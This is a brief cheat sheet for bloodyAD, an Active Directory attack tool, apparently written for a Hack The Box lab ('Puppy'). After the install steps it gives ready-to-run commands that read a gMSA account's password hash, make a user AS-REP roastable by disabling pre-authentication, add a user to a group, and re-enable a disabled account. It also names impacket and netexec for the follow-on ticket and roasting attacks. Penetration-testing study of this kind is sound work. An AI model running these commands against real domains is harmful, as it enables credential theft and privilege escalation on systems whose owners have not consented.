CheatSheet

bloodyAD

1.0 Installation

git clone https://github.com/CravateRouge/bloodyAD
cd bloodyAD
python -m venv .venv
source .venv/bin/activate

2.0 Configuration

3.0 Usage

3.1 Attacking GMSA Accounts

bloodyAD --host dc.domain.local -d domain.local --dc-ip $ip -k get object 'GMSA01$' --attr msDS-ManagedPassword

You can use the NTLM Hash to obtain a TGT with impacket-getTGT

3.2 Make User ASRepRoastable

bloodyAD --host dc.domain.local -d domain.local --dc-ip $dcip -k add uac $targetuser -f DONT_REQ_PREAUTH

You can ASRepRoast the user with netexec --asreproast or impacket-GetNPUsers

3.3 Add user to group

bloodyAD --host dc.domain.local -d domain.local --dc-ip $dcip -k add groupMember 'targetgroup' 'usertoadd'

3.4 Activate account

bloodyAD --host dc.domain.local --dc-ip $dcip -d domain.local -k remove uac 'UserToActivate' -f ACCOUNTDISABLE

4.0 Hints

5.0 References

HTB-Puppy